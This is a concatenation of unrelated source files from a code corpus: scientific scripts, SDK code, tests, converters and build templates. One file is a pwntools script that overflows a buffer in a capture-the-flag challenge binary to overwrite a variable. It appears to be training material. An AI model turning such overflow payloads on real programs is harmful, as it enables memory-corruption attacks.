""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,valueProvider,evaluator,ruleValue,epsilon):
""" __new__(cls: type,valueProvider: FilterableValueProvider,evaluator: FilterNumericRuleEvaluator,ruleValue: float,epsilon: float) """
pass
Epsilon=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The tolerance within which two floating-point values may be considered equal.
Get: Epsilon(self: FilterDoubleRule) -> float
Set: Epsilon(self: FilterDoubleRule)=value
"""
RuleValue=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The user-supplied value against which values from a Revit document will be tested.
Get: RuleValue(self: FilterDoubleRule) -> float
Set: RuleValue(self: FilterDoubleRule)=value
"""
|
[
"gtalarico@gmail.com"
] |
gtalarico@gmail.com
|
5be03d61a8e343b861e064451418f9530ddfa6e1
|
28a3860f80ff80ae3ce0650f99a7b8e00fbfdb4f
|
/compredospequenos/viviremediavenv/bin/futurize
|
e5e7466a0a3f40107a8ec3ef9ac5ee6fc7c3dd59
|
[] |
no_license
|
ladislauadri/compredospequenos
|
3a47f9433c2a6c389c2b02c04b587e70c5fb1168
|
639d44c0488700b0bb359e83c16ee9c6302aad17
|
refs/heads/main
| 2023-03-08T07:27:12.970315
| 2021-02-18T10:56:49
| 2021-02-18T10:56:49
| 339,982,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
#!/var/django/compredospequenos/viviremediavenv/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'futurize')()
)
|
[
"kurunko@hotmail.com"
] |
kurunko@hotmail.com
|
|
48bffe0c9f300459f379cdb715aa7d5b13343fa1
|
9e401071eb220b299df1fec0be5a6da0976d6a9b
|
/wordlioud.py
|
1c478e796e64b6dca0635812380a1582a769f39b
|
[] |
no_license
|
skyshu/WordCloudExample
|
543ccc4eeacf5a4962cefee3f9cf9912f5b5dc2b
|
f44311bcdc4e05af7eab2700833436698ff27964
|
refs/heads/master
| 2021-01-21T17:57:30.420006
| 2017-05-22T04:08:41
| 2017-05-22T04:08:41
| 92,003,767
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,474
|
py
|
#coding:utf-8
from os import path
from scipy.misc import imread
import matplotlib.pyplot as plt
import jieba
import codecs
from wordcloud import WordCloud, ImageColorGenerator
# get the path of the current file
# __file__ is this file; running this line in an IDE may raise an error,
# in which case it can be replaced with: d = path.dirname('.')
d = path.dirname(__file__)
# read the text; alice.txt is in the package's example directory
text = open(path.join(d, 'alice.txt')).read()
# Chinese word segmentation
cut_text = " ".join(jieba.cut(text))
# read the mask / color image
# set the background/mask image
alice_coloring = imread(path.join(d, "love.png"))
wc = WordCloud(
    # font that can render Chinese characters
    font_path="HYQiHei-25J.ttf",
    # background color
    background_color="white",
    # maximum number of words shown in the cloud
    max_words=200,
    # background/mask image
    mask=alice_coloring,
    # maximum font size
    max_font_size=80,
)
# generate the word cloud; alternatively, compute word frequencies first and
# use the generate_from_frequencies function
wc.generate(cut_text)
# fre = {u'eating': 100, u'sleeping': 20, u'goofing off': 80}
# (without the u prefix the Chinese keys come out garbled on Python 2)
# wc.generate_from_frequencies(fre)
# generate color values from the background image
image_colors = ImageColorGenerator(alice_coloring)
# show the default word cloud
plt.imshow(wc)
plt.axis("off")
# draw the word cloud recolored with the image's palette
plt.figure()
plt.imshow(wc.recolor(color_func=image_colors))
plt.axis("off")
# draw the original image
#plt.figure()
#plt.imshow(alice_coloring, cmap=plt.cm.gray)
#plt.axis("off")
plt.show()
# save the image
wc.to_file(path.join(d, "LOVE.png"))
|
[
"="
] |
=
|
cbe4a683f083cefc8d159895afa7eb75d352e5c8
|
5b93930ce8280b3cbc7d6b955df0bfc5504ee99c
|
/nodes/Ramsundar18TensorFlow/D_Chapter3/D_Review/index.py
|
ee8d6792fe9cd217a56ecbb6f3b415dcf80f3fc2
|
[] |
no_license
|
nimra/module_gen
|
8749c8d29beb700cac57132232861eba4eb82331
|
2e0a4452548af4fefd4cb30ab9d08d7662122cf4
|
refs/heads/master
| 2022-03-04T09:35:12.443651
| 2019-10-26T04:40:49
| 2019-10-26T04:40:49
| 213,980,247
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,004
|
py
|
# Lawrence McAfee
# ~~~~~~~~ import ~~~~~~~~
from modules.node.HierNode import HierNode
from modules.node.LeafNode import LeafNode
from modules.node.Stage import Stage
from modules.node.block.CodeBlock import CodeBlock as cbk
from modules.node.block.ImageBlock import ImageBlock as ibk
from modules.node.block.MarkdownBlock import MarkdownBlock as mbk
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Review
# In this chapter, we’ve shown you how to build and train some simple learning systems
# in TensorFlow. We started by reviewing some foundational mathematical concepts
# including loss functions and gradient descent. We then introduced you to some new
# TensorFlow concepts such as placeholders, scopes, and TensorBoard. We ended the
# chapter with case studies that trained linear and logistic regression systems on toy
# datasets. We covered a lot of material in this chapter, and it’s OK if you haven’t yet
# internalized everything. The foundational material introduced here will be used
# throughout the remainder of this book.
# In Chapter 4, we will introduce you to your first deep learning model and to fully
# connected networks, and will show you how to define and train fully connected
# networks in TensorFlow. In following chapters, we will explore more complicated deep
# networks, but all of these architectures will use the same fundamental learning
# principles introduced in this chapter.
#
# CHAPTER 4
# Fully Connected Deep Networks
#
# This chapter will introduce you to fully connected deep networks. Fully connected
# networks are the workhorses of deep learning, used for thousands of applications.
# The major advantage of fully connected networks is that they are “structure agnostic.”
# That is, no special assumptions need to be made about the input (for example, that
# the input consists of images or videos). We will make use of this generality to use fully
# connected deep networks to address a problem in chemical modeling later in this
# chapter.
# We delve briefly into the mathematical theory underpinning fully connected
# networks. In particular, we explore the concept that fully connected architectures are
# “universal approximators” capable of learning any function. This concept provides an
# explanation of the generality of fully connected architectures, but comes with many
# caveats that we discuss at some depth.
# While being structure agnostic makes fully connected networks very broadly
# applicable, such networks do tend to have weaker performance than special-purpose
# networks tuned to the structure of a problem space. We will discuss some of the
# limitations of fully connected architectures later in this chapter.
#
# What Is a Fully Connected Deep Network?
# A fully connected neural network consists of a series of fully connected layers. A fully
# connected layer is a function from ℝ^m to ℝ^n. Each output dimension depends on
# each input dimension. Pictorially, a fully connected layer is represented as follows in
# Figure 4-1.
#
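# Illustrative addition (not part of the original module): one fully connected
# layer is an affine map followed by a nonlinearity, y = relu(W @ x + b),
# sending an input in R^m to an output in R^n.
import numpy as np  # assumed available for this sketch
def _fully_connected_sketch(x, W, b):
    """Minimal dense layer: W has shape (n, m), x shape (m,), b shape (n,)."""
    return np.maximum(0.0, W @ x + b)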
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Content(LeafNode):
def __init__(self):
super().__init__(
"Review",
# Stage.CROP_TEXT,
# Stage.CODE_BLOCKS,
# Stage.MARKDOWN_BLOCKS,
# Stage.FIGURES,
# Stage.EXERCISES,
# Stage.CUSTOMIZED,
)
self.add(mbk("# Review"))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Review(HierNode):
def __init__(self):
super().__init__("Review")
self.add(Content())
# eof
|
[
"lawrence.mcafee@gmail.com"
] |
lawrence.mcafee@gmail.com
|
ad8a8be88f337d0531bf7228029cf49b62dfd7ff
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/math_numbers/number_relations.py
|
54380ae099fc73542c01e7baa6c84156986a75ef
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635
| 2023-07-17T12:35:16
| 2023-07-17T12:35:16
| 117,093,746
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,649
|
py
|
#! /usr/bin/python3.5
import decimal
import math
import numpy as np
import matplotlib.pyplot as plt
from decimal import Decimal as D
from functools import reduce
decimal.getcontext().prec = 2000
def to_digit_list(n):
return list(map(int, list(str(n))))
''' Number manipulation functions '''
def digit_sum(n):
return np.sum(to_digit_list(n))
def digit_diff(n):
    # differences of adjacent digit pairs, taken mod 10, re-joined into an int
    l = list(map(int, list(str(n))))
    return int("".join(list(map(lambda a, b: str((a-b)%10), l[1:], l[:-1]))))
def digit_prod(n):
    l = np.array(to_digit_list(n))
    l[l==0] = 1  # treat zero digits as 1 so the product never collapses to 0
    return np.prod(l)
a = 1234568
print("a: {}".format(a))
print("digit_sum(a): {}".format(digit_sum(a)))
print("digit_diff(a): {}".format(digit_diff(a)))
print("digit_prod(a): {}".format(digit_prod(a)))
n_max = 100000
l_dig_sums = [digit_sum(i) for i in range(0, n_max+1)]
l_dig_diffs = [0 for _ in range(0, 10)]+[digit_diff(i) for i in range(10, n_max+1)]
l_dig_prods = [digit_prod(i) for i in range(0, n_max+1)]
print("np.min(l_dig_sums): {}".format(np.min(l_dig_sums)))
print("np.min(l_dig_diffs): {}".format(np.min(l_dig_diffs)))
print("np.min(l_dig_prods): {}".format(np.min(l_dig_prods)))
print("np.max(l_dig_sums): {}".format(np.max(l_dig_sums)))
print("np.max(l_dig_diffs): {}".format(np.max(l_dig_diffs)))
print("np.max(l_dig_prods): {}".format(np.max(l_dig_prods)))
ls = []
for n in range(1, 1000):
l = [n]
j = n
for i in range(0, 10):
j = l_dig_sums[j]
l.append(j)
# j = l_dig_diffs[j]
# l.append(j)
j = l_dig_prods[j]
l.append(j)
ls.append((n, l))
for n, l in ls:
print("n: {}, l:\n{}".format(n, l))
|
[
"hziko314@gmail.com"
] |
hziko314@gmail.com
|
68d0876c783e333bac7aede80bfc8173d2d38b21
|
ee2181511a6e4165c348d3c20d01f81673650e33
|
/dask_xgboost/core.py
|
ca3b8309a75d1b557d7f0d7882ded76248b83891
|
[] |
no_license
|
sunyoubo/dask-xgboost
|
bf7f7ef20b39203145591911f44739748ae8debf
|
7cedc4fad9b82ce07bb90a9dd91f8a9cda84659e
|
refs/heads/master
| 2021-05-08T05:56:52.429563
| 2017-10-04T18:17:08
| 2017-10-04T18:17:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,518
|
py
|
from collections import defaultdict
import logging
from threading import Thread
import dask.dataframe as dd
import dask.array as da
import numpy as np
import pandas as pd
from toolz import first, assoc
from tornado import gen
from dask import delayed
from distributed.client import _wait
from distributed.utils import sync
import xgboost as xgb
from .tracker import RabitTracker
logger = logging.getLogger(__name__)
def parse_host_port(address):
if '://' in address:
address = address.rsplit('://', 1)[1]
host, port = address.split(':')
port = int(port)
return host, port
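# Illustrative example (the address value is made up, not from the original):
#   parse_host_port('tcp://192.168.1.100:8786') == ('192.168.1.100', 8786)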
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
else:
raise TypeError("Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0]))
def train_part(env, param, list_of_parts, **kwargs):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
model if rank zero, None otherwise
"""
data, labels = zip(*list_of_parts) # Prepare data
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
dtrain = xgb.DMatrix(data, labels) # Convert to xgboost data structure
args = [('%s=%s' % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, **kwargs)
if xgb.rabit.get_rank() == 0: # Only return from one worker
result = bst
else:
result = None
finally:
xgb.rabit.finalize()
return result
@gen.coroutine
def _train(client, params, data, labels, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = data.to_delayed()
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield _wait(parts)
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(start_tracker,
host.strip('/:'),
len(worker_map))
# Tell each worker to train on the chunks/parts that it has locally
futures = [client.submit(train_part, env,
assoc(params, 'nthreads', ncores[worker]),
list_of_parts, workers=worker, **kwargs)
for worker, list_of_parts in worker_map.items()]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v][0]
raise gen.Return(result)
def train(client, params, data, labels, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
**kwargs:
Keywords to give to XGBoost
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return sync(client.loop, _train, client, params, data, labels, **kwargs)
def _predict_part(part, model=None):
xgb.rabit.init()
dm = xgb.DMatrix(part)
result = model.predict(dm)
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
result = pd.Series(result, index=part.index, name='predictions')
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
>>> model
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
    if isinstance(data, dd._Frame):
        result = data.map_partitions(_predict_part, model=model)
    elif isinstance(data, da.Array):
        result = data.map_blocks(_predict_part, model=model, dtype=float,
                                 drop_axis=1)
    else:
        raise TypeError("Data must be a dask dataframe or dask array. "
                        "Got %s" % type(data))  # avoid returning an unbound result
    return result
|
[
"mrocklin@gmail.com"
] |
mrocklin@gmail.com
|
8a98a0654fc13703c66153234d7ba4d3b9c49692
|
4a7b5b3c2819dbf9b2bdfafcdf31745f88cf98b6
|
/jaraco/financial/paychex.py
|
40affd8d58d470882c7deae625312c3975f07cd9
|
[
"MIT"
] |
permissive
|
jaraco/jaraco.financial
|
7eb37fddc37e029ac38e162aaaf1a3bd1767a921
|
a5d0f996b2ee6bf9051d94d2a5656a1ca3f8b607
|
refs/heads/main
| 2023-09-01T15:12:26.069574
| 2023-08-06T23:45:05
| 2023-08-06T23:45:05
| 53,203,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,841
|
py
|
"""
Paychex, when they generate OFX downloads of their 401k account
data, their routine crashes and terminates output when it
encounters a Gain/Loss entry.
This routine takes instead the CSV output and generates a
proper OFX file suitable for importing into your favorite
accounting system.
"""
import itertools
import os
import copy
import decimal
import datetime
import logging
from textwrap import dedent
import autocommand
import ofxparse
import csv
log = logging.getLogger(__name__)
def header(ofx):
for field, value in ofx.headers.items():
yield f'{field}:{value}'
yield dedent(
f"""
<OFX>
<SIGNONMSGSRSV1>
<SONRS>
<STATUS>
<CODE>{ofx.signon.code}</CODE>
<SEVERITY>{ofx.signon.severity}</SEVERITY>
</STATUS>
<DTSERVER>{ofx.signon.dtserver}</DTSERVER>
<LANGUAGE>{ofx.signon.language}</LANGUAGE>
</SONRS>
</SIGNONMSGSRSV1>
"""
).strip()
yield dedent(
f"""
<INVSTMTMSGSRSV1>
<INVSTMTTRNRS>
<TRNUID>1</TRNUID>
<STATUS>
<CODE>0</CODE>
<SEVERITY>INFO</SEVERITY>
</STATUS>
<INVSTMTRS>
<DTASOF>{datetime.date.today().strftime("%Y%m%d")}</DTASOF>
<CURDEF>{ofx.account.statement.currency}</CURDEF>
<INVACCTFROM>
<BROKERID>{ofx.account.brokerid}</BROKERID>
<ACCTID>{ofx.account.account_id}</ACCTID>
</INVACCTFROM>
<INVTRANLIST>
<DTSTART>{ofx.account.statement.start_date.strftime("%Y%m%d")}</DTSTART>
<DTEND>{ofx.account.statement.end_date.strftime("%Y%m%d")}</DTEND>
"""
).strip()
tmpl = dedent(
"""
<{type}MF>
<INV{type}>
<INVTRAN>
<FITID>{abs_amount}{abs_shares}{price:0.6f}{row[Date]}</FITID>
<DTTRADE>{ofx_date}</DTTRADE>
<MEMO>{row[Transaction]}</MEMO>
</INVTRAN>
<SECID>
<UNIQUEID>{security.uniqueid}</UNIQUEID>
<UNIQUEIDTYPE>CUSIP</UNIQUEIDTYPE>
</SECID>
<UNITS>{abs_shares}</UNITS>
<UNITPRICE>{row[Price]}</UNITPRICE>
<TOTAL>{row[Amount]}</TOTAL>
<CURRENCY>
<CURRATE>1.0000</CURRATE>
<CURSYM>USD</CURSYM>
</CURRENCY>
<SUBACCTSEC>OTHER</SUBACCTSEC>
<SUBACCTFUND>OTHER</SUBACCTFUND>
</INV{type}>
<{type}TYPE>{type}</{type}TYPE>
</{type}MF>"""
).strip()
def to_ofx(row, securities):
if row['Shares'] == 'N/A':
return
amount = decimal.Decimal(row['Amount'])
price = decimal.Decimal(row['Price'])
shares = decimal.Decimal(row['Shares'])
type = 'SELL' if shares < 0 else 'BUY'
abs_amount = abs(amount)
abs_shares = abs(shares)
date = datetime.datetime.strptime(row['Date'], '%m/%d/%Y').date()
ofx_date = date.strftime('%Y%m%d')
security = securities[row['Ticker']]
yield tmpl.format_map(locals())
def footer(ofx):
"""
Given the original OFX template, extract the securities list.
"""
yield dedent(
"""
</INVTRANLIST>
</INVSTMTRS>
</INVSTMTTRNRS>
</INVSTMTMSGSRSV1>
<SECLISTMSGSRSV1>
<SECLIST>"""
).strip()
for sec in ofx.security_list:
yield dedent(
f"""
<MFINFO>
<SECINFO>
<SECID>
<UNIQUEID>{sec.uniqueid}</UNIQUEID>
<UNIQUEIDTYPE>CUSIP</UNIQUEIDTYPE>
</SECID>
<SECNAME>{sec.name}</SECNAME>
<TICKER>{sec.ticker}</TICKER>
</SECINFO>
</MFINFO>
"""
).strip()
yield dedent(
"""
</SECLIST>
</SECLISTMSGSRSV1>
</OFX>
"""
).strip()
def remove_bad(data):
"""
PayChex seems to have other behaviors that yield bad data
in the CSV. Log the presence of these rows and exclude
them.
"""
for n, row in enumerate(data, start=1):
if row['Ticker'] == 'null':
log.warning(f"Encountered bad row {n}: {row}")
continue
yield row
@autocommand.autocommand(__name__)
def main(csv_filename, ofx_filename, limit: int = None):
"""
Create a new OFX file based on the CSV and OFX downloads from
PayChex.
"""
logging.basicConfig(level=logging.INFO)
csv_filename = os.path.expanduser(csv_filename)
ofx_filename = os.path.expanduser(ofx_filename)
ofx = ofxparse.OfxParser.parse(open(ofx_filename))
for line in header(ofx):
print(line)
dialect = copy.copy(csv.excel)
dialect.skipinitialspace = True
data = csv.DictReader(open(csv_filename), dialect=dialect)
securities = {security.ticker: security for security in ofx.security_list}
for row in itertools.islice(remove_bad(data), limit):
for line in to_ofx(row, securities):
print(line)
for line in footer(ofx):
print(line)
|
[
"jaraco@jaraco.com"
] |
jaraco@jaraco.com
|
efbf8677c2ce4ad6ed0ecb013edc7f601f9907bf
|
978248bf0f275ae688f194593aa32c267832b2b6
|
/xlsxwriter/test/styles/test_write_cell_style.py
|
e348931f5c8422daa52141da17985d77bc95e182
|
[
"BSD-2-Clause-Views"
] |
permissive
|
satish1337/XlsxWriter
|
b0c216b91be1b74d6cac017a152023aa1d581de2
|
0ab9bdded4f750246c41a439f6a6cecaf9179030
|
refs/heads/master
| 2021-01-22T02:35:13.158752
| 2015-03-31T20:32:28
| 2015-03-31T20:32:28
| 33,300,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...styles import Styles
class TestWriteCellStyle(unittest.TestCase):
"""
Test the Styles _write_cell_style() method.
"""
def setUp(self):
self.fh = StringIO()
self.styles = Styles()
self.styles._set_filehandle(self.fh)
def test_write_cell_style(self):
"""Test the _write_cell_style() method"""
self.styles._write_cell_style()
exp = """<cellStyle name="Normal" xfId="0" builtinId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
f02305cf4e2591a356cae884abd638de7a8fa9fc
|
cbf9f600374d7510988632d7dba145c8ff0cd1f0
|
/abc/190/c.py
|
07fa190a978955b4555478224dd795a4394b14cf
|
[] |
no_license
|
sakakazu2468/AtCoder_py
|
d0945d03ad562474e40e413abcec39ded61e6855
|
34bdf39ee9647e7aee17e48c928ce5288a1bfaa5
|
refs/heads/master
| 2022-04-27T18:32:28.825004
| 2022-04-21T07:27:00
| 2022-04-21T07:27:00
| 225,844,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 719
|
py
|
n, m = map(int, input().split())
condition = []
for i in range(m):
a, b = map(int, input().split())
condition.append([a, b])
k = int(input())
ball = []
for i in range(k):
c, d = map(int, input().split())
ball.append([c, d])
decision = []
for intnum in range(2**k):
binnum = bin(intnum)[2:]
binnum = binnum.zfill(k)
state = []
for j in range(len(binnum)):
state.append(ball[j][int(binnum[j])])
decision.append(state)
max_satis = -1
for i in range(len(decision)):
satis = 0
for j in range(len(condition)):
if (condition[j][0] in decision[i]) and (condition[j][1] in decision[i]):
satis += 1
max_satis = max(max_satis, satis)
print(max_satis)
|
[
"sakakazu2468@icloud.com"
] |
sakakazu2468@icloud.com
|
69c3575e4bc800259603a29d1a2a5811c432892c
|
bd3b4a3403ad0476d287eb555bbe4211134b093e
|
/nuitka/codegen/templates/CodeTemplatesIterators.py
|
720c515a35f61ab167035473f612312da61f9a33
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
suryansh2020/Nuitka
|
7ecff5bd0199a6510e446be13569c829ba165be5
|
3dd382e91884a77c28aeee6b0bd44a0fc58beee8
|
refs/heads/master
| 2021-01-19T14:28:47.154859
| 2014-12-21T07:34:12
| 2014-12-21T07:34:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,885
|
py
|
# Copyright 2014, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Templates for the iterator handling.
"""
template_iterator_check = """\
// Check if iterator has left-over elements.
assertObject( %(iterator_name)s ); assert( PyIter_Check( %(iterator_name)s ) );
%(attempt_name)s = (*Py_TYPE( %(iterator_name)s )->tp_iternext)( %(iterator_name)s );
if (likely( %(attempt_name)s == NULL ))
{
// TODO: Could first fetch, then check, should be faster.
if ( !ERROR_OCCURED() )
{
}
else if ( PyErr_ExceptionMatches( PyExc_StopIteration ))
{
PyErr_Clear();
}
else
{
PyErr_Fetch( &exception_type, &exception_value, (PyObject **)&exception_tb );
%(release_temps_1)s
goto %(exception_exit)s;
}
}
else
{
Py_DECREF( %(attempt_name)s );
// TODO: Could avoid PyErr_Format.
#if PYTHON_VERSION < 300
PyErr_Format( PyExc_ValueError, "too many values to unpack" );
#else
PyErr_Format( PyExc_ValueError, "too many values to unpack (expected %(count)d)" );
#endif
PyErr_Fetch( &exception_type, &exception_value, (PyObject **)&exception_tb );
%(release_temps_2)s
goto %(exception_exit)s;
}"""
|
[
"kay.hayen@gmail.com"
] |
kay.hayen@gmail.com
|
0bdf3e816ff9ec54f042fc647c0bff60a6dfa776
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/kuv_16078+1916/sdB_kuv_16078+1916_lc.py
|
e2e7da47b7b2cee664f35675ccc1dfa277b97a7f
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[242.511208,19.132844], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_kuv_16078+1916/sdB_kuv_16078+1916_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
5f3d93adb6e1b349c18fda1d3b4c003973388250
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00-BofVar/cuctf19_bof1/verified-exploit-BofVar-1.py
|
c2f027d3b604c21593fd4310b04ec142c6764730
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318
| 2020-10-05T06:45:16
| 2020-10-05T06:45:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,103
|
py
|
# +------------------------------------------------+
# | Atack: Overwrite Variables |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/04-bof_variable
from pwn import *
import time
import sf
target = process("./chall-test_cuctf19-bof1")
gdb.attach(target)
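# Interpretive gloss (added; offsets come from the script itself): the sf
# helper appears to build a payload where user input begins 0x58 bytes into
# the frame and the 32-bit target variable at offset 0x18 is overwritten
# with the value 0x1.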
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x18, 0x1)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Hail to the King |
# +------------------------------------------------+
# | There's a taste of fear |
# | when the henchmen call |
# | iron fist to tame the lands |
# | iron fist to claim it all |
# +------------------------------------------------+
|
[
"ryancmeinke@gmail.com"
] |
ryancmeinke@gmail.com
|
f430a0ac37b1b88571218138a666585365a31784
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2022_04_30_preview/_iot_hub_client.py
|
47230c84ab3900aa522476f57ff1fb01a0045485
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,158
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, TYPE_CHECKING
from azure.core.rest import HttpRequest, HttpResponse
from azure.mgmt.core import ARMPipelineClient
from . import models as _models
from .._serialization import Deserializer, Serializer
from ._configuration import IotHubClientConfiguration
from .operations import (
